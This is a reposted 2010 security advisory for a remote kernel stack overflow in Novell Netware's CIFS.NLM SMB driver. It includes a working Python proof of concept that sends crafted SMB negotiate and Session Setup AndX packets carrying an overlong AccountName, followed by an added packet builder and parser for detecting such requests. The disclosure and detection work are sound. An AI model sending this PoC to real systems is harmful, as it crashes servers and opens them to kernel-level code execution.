
Netware SMB Remote Stack Overflow PoC

Posted on 17 June 2010

=====================================
Netware SMB Remote Stack Overflow PoC
=====================================

Title: Netware SMB Remote Stack Overflow
Version: 1.0
Issue type: Stack Overflow
Affected vendor: Novell
Release date: 17/06/2010
Discovered by: Laurent Gaffié
Issue status: Patch available

===============================================================================

Summary
-------

A vulnerability exists in the Netware CIFS.NLM driver which allows an attacker to trigger a kernel stack overflow by sending a specific 'Session Setup AndX' request. Successful exploitation of this issue results in remote code execution with kernel privileges. Failed attempts may result in a remote denial of service.

Description
-----------

The Server Message Block (SMB) protocol, also known as Common Internet File System (CIFS), is an application-layer protocol that provides shared access to files, printers and Inter-Process Communication (IPC). It is also a transport for Distributed Computing Environment / Remote Procedure Call (DCE/RPC) operations.

After negotiating an SMB dialect, the client sends a 'Session Setup AndX' request to establish a session before it can connect to a specific share. By sending a specially crafted request containing an overlong 'AccountName' value, it is possible to trigger a kernel stack overflow.

Impact
------

A remote attacker may be able to execute code with kernel privileges on affected Netware systems. Failed attempts result in a denial of service.

Affected products
-----------------

Netware version 6.5 SP8 and prior.

Proof of concept
----------------

import sys
from socket import socket, AF_INET, SOCK_STREAM

if len(sys.argv) <= 1:
    sys.exit('usage: python netware.py IP_ADDR')

host = (sys.argv[1], 139)   # NetBIOS session service

# Overlong AccountName value that overruns the kernel stack buffer in CIFS.NLM
payload = b"A" * 200

# SMB_COM_NEGOTIATE (0x72): NetBIOS header, SMB header, dialect list
packetnego = (
    b"\x00\x00\x00\x9a"
    b"\xff\x53\x4d\x42\x72\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00"
    b"\x01\x3d\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52"
    b"\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02"
    b"\x4d\x49\x43\x52\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x29\x4f"
    b"\x52\x4b\x53\x20\x33\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d"
    b"\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x44\x4f\x53\x20\x4c\x41"
    b"\x4e\x4d\x20\x4e\x32\x2e\x31\x00\x02\x57\x69\x6e\x64\x6f\x77"
    b"\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70"
    b"\x73\x20\x33\x2e\x31\x61\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30"
    b"\x2e\x31\x32\x00"
)

# SMB_COM_SESSION_SETUP_ANDX (0x73) chained with SMB_COM_TREE_CONNECT_ANDX (0x75);
# the payload lands in the username (AccountName) field: basic stack overflow.
packetsession = (
    b"\x00\x00\x01\x3e"
    b"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf9\x19\x01\x00\x81\x61"
    b"\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
    b"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x28\xd4\xce"
    b"\xd7\x93\xc8\x8b\x16\x5f\x42\x2a\x7a\xfd\x15\x7a\xfd\x15\x7a\xfd" + payload +
    b"\xef\xa5\x42\x5e\x5c\x2d\x4b\x1a\x1c\x59\x4f\x00\x57\x4f\x52\x4b"
    b"\x47\x52\x4f\x55\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e"
    b"\x30\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff"
    b"\x00\x00\x00\x02\x00\x01\x00\x1f\x00\x00\x5c\x5c\x57\x49\x4e\x2d"
    b"\x45\x37\x4a\x30\x4f\x4e\x49\x4d\x53\x45\x33\x5c\x55\x53\x45\x52"
    b"\x53\x00\x3f\x3f\x3f\x3f\x3f\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(packetnego)
s.send(packetsession)
print("done !")

Solution
--------

Apply the NSS update located at:

* http://download.novell.com/Download?buildid=tMWCI1cdI7s~

This patch has not been verified by stratsec.

Response timeline
-----------------

* 07/02/2010 - Issue discovered.
* 10/02/2010 - Vendor notified.
* 10/02/2010 - Vendor acknowledged receipt of advisory.
* 11/02/2010 - Vendor confirmed issue presence.
* 16/06/2010 - Patch released by vendor.
* 17/06/2010 - stratsec advisory published.

References
----------

* Vendor advisory: http://download.novell.com/Download?buildid=tMWCI1cdI7s~

# Inj3ct0r.com [2010-06-17]
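The Session Setup AndX request described above, as an added example that is not the advisory's PoC or Novell code: a builder that derives the NetBIOS length and ByteCount from the fields (the PoC hard-codes 0x013e and 0x3d, which are not recomputed for its 200-byte payload), plus a parser that recovers the AccountName length from a NetBIOS-framed request so an overlong value can be flagged in captured traffic. The domain, NativeOS and NativeLanMan strings, the 64-byte threshold and the sample account names are assumptions; the sample requests are constructed by the builder itself.

```python
import struct

# Added example (not the advisory's PoC). Builds and parses an SMB1
# SESSION_SETUP_ANDX request (NT LM 0.12, non-extended security,
# WordCount 13). Field values and the threshold below are assumptions.

SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_NO_ANDX = 0xFF          # "no further AndX command" marker
FLAGS2_UNICODE = 0x8000
MAX_ACCOUNT_NAME = 64           # hypothetical detection threshold (bytes)


def smb_header(command, flags=0x18, flags2=0x0001, tid=0, pid=0x1234, uid=0, mid=1):
    """32-byte SMB1 header: protocol, command, status, flags, flags2,
    PIDHigh, SecurityFeatures, reserved, TID, PIDLow, UID, MID."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, 0, flags, flags2,
                       0, b"\x00" * 8, 0, tid, pid, uid, mid)


def session_setup_andx(account_name, domain=b"WORKGROUP", native_os=b"Unix",
                       native_lm=b"Example", oem_password=b""):
    """NetBIOS-framed Session Setup AndX request with ByteCount and NetBIOS
    length computed from the data block instead of hard-coded."""
    data = (oem_password + account_name + b"\x00" + domain + b"\x00"
            + native_os + b"\x00" + native_lm + b"\x00")
    params = struct.pack("<BBHHHHIHHII",
                         SMB_COM_NO_ANDX, 0, 0,        # AndXCommand, reserved, AndXOffset
                         0xFFFF, 2, 0,                 # MaxBufferSize, MaxMpxCount, VcNumber
                         0,                            # SessionKey
                         len(oem_password), 0,         # OEM / Unicode password lengths
                         0, 0)                         # reserved, Capabilities (none)
    body = bytes([13]) + params + struct.pack("<H", len(data)) + data
    smb = smb_header(SMB_COM_SESSION_SETUP_ANDX) + body
    # NetBIOS session service header: type 0x00 (session message) followed by
    # a 24-bit length; a single big-endian 32-bit pack yields both fields.
    return struct.pack(">I", len(smb)) + smb


def parse_session_setup_andx(packet):
    """Parse a NetBIOS-framed Session Setup AndX request and return its fields.
    Raises ValueError on framing or length inconsistencies."""
    if len(packet) < 4 + 61:
        raise ValueError("truncated packet")
    netbios_len = struct.unpack(">I", packet[:4])[0] & 0x1FFFF
    smb = packet[4:]
    if len(smb) != netbios_len:
        raise ValueError("NetBIOS length does not match payload")
    if smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not a Session Setup AndX request")
    unicode = bool(struct.unpack("<H", smb[10:12])[0] & FLAGS2_UNICODE)
    if smb[32] != 13:
        raise ValueError("unexpected WordCount (extended security request?)")
    (andx_cmd, _r, _off, _mb, _mpx, _vc, _key,
     oem_len, uni_len, _res, _caps) = struct.unpack("<BBHHHHIHHII", smb[33:59])
    byte_count = struct.unpack("<H", smb[59:61])[0]
    data = smb[61:]
    if len(data) < byte_count:
        raise ValueError("ByteCount exceeds packet")
    data = data[:byte_count]
    start = oem_len + uni_len           # AccountName follows both password blobs
    if unicode and (61 + start) % 2:
        start += 1                      # Unicode strings are 2-byte aligned
    if unicode:
        end = start
        while end + 1 < len(data) and data[end:end + 2] != b"\x00\x00":
            end += 2
        if data[end:end + 2] != b"\x00\x00":
            raise ValueError("unterminated AccountName")
    else:
        end = data.find(b"\x00", start)
        if end < 0:
            raise ValueError("unterminated AccountName")
    name = data[start:end]
    return {"netbios_len": netbios_len, "andx_command": andx_cmd,
            "byte_count": byte_count, "unicode": unicode,
            "account_name": name, "account_name_len": len(name)}


def is_suspicious(packet, limit=MAX_ACCOUNT_NAME):
    """True when the AccountName is longer than any legitimate client sends."""
    return parse_session_setup_andx(packet)["account_name_len"] > limit


if __name__ == "__main__":
    # Constructed samples: a benign login and the advisory's 200-byte name.
    for name in (b"guest", b"A" * 200):
        pkt = session_setup_andx(name)
        info = parse_session_setup_andx(pkt)
        print(len(pkt), info["byte_count"], info["account_name_len"], is_suspicious(pkt))
```

The parser only understands the WordCount-13 form of the request (no extended security blob), which is the form the PoC sends; pointing it at Session Setup AndX requests carved from a capture of port 139/445 traffic gives a cheap check for the overlong-AccountName pattern, and the length checks reject frames whose NetBIOS length or ByteCount disagrees with the bytes actually present.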
